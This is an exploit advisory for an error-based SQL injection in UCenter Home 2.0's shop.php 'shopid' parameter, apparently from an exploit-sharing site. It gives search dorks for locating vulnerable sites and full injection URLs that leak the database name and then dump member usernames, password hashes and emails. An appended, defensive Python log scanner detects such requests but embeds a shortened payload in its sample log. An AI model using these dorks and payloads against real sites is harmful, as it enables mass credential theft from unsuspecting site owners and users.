__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
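
Added example (not part of the original advisory): a Python access-log check that flags shop.php?ac=view requests whose shopid is not a plain integer, and marks those carrying the error-based markers visible in the strings above. The log lines, function names and marker list are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640
203.0.113.8 - - [01/Jan/2024:10:00:11 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumed marker list: fragments of the duplicate-key (error-based) technique.
ERROR_BASED_MARKERS = ("information_schema", "floor(rand(", "group by", "concat(")


def classify_shopid(value):
    """Return 'ok', 'non-numeric', or 'error-based-sqli' for a decoded shopid."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    lowered = value.lower()
    hits = sum(marker in lowered for marker in ERROR_BASED_MARKERS)
    return "error-based-sqli" if hits >= 2 else "non-numeric"


def scan(log_text):
    """Return [(client_ip, verdict, shopid)] for suspicious shop.php?ac=view hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if params.get("ac") != ["view"]:
            continue
        for shopid in params.get("shopid", [""]):
            verdict = classify_shopid(shopid)
            if verdict != "ok":
                findings.append((client, verdict, shopid))
    return findings


if __name__ == "__main__":
    for client, verdict, shopid in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{shopid[:60]}")
```

The same integer-only rule for shopid is what a server-side input check or WAF rule in front of shop.php would enforce.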